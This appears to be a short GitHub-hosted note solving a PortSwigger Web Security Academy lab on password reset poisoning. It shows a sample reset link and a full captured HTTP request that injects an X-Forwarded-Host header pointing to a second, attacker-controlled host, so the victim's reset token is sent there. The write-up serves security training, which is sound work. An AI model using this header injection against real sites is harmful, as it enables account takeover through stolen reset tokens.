-
Notifications
You must be signed in to change notification settings - Fork 2
/
Password reset poisoning.txt
26 lines (20 loc) · 1.04 KB
/
Password reset poisoning.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
Password reset poisoning
Great solution, nothing really worth adding.
Here's how the reset link looks like:
https://acde1fb21fe0d79b80b24ec6008700ed.web-security-academy.net/forgot-password?temp-forgot-password-token=uTYtyJ209QfQEF6JEs7fXN32ZU97Arqx
Repeater request:
POST /forgot-password HTTP/1.1
Host: acde1fb21fe0d79b80b24ec6008700ed.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
X-Forwarded-Host: ac3f1f301f65d7d280474e2f018800c5.web-security-academy.net
Origin: https://acde1fb21fe0d79b80b24ec6008700ed.web-security-academy.net
Connection: close
Referer: https://acde1fb21fe0d79b80b24ec6008700ed.web-security-academy.net/forgot-password
Cookie: session=4l3LiV1jpVHA8ouDChKd0tyvupTjx3Cm
Upgrade-Insecure-Requests: 1
csrf=Ngq2Y2hw72vspQog19xJs1zxo9D3FX9c&username=carlos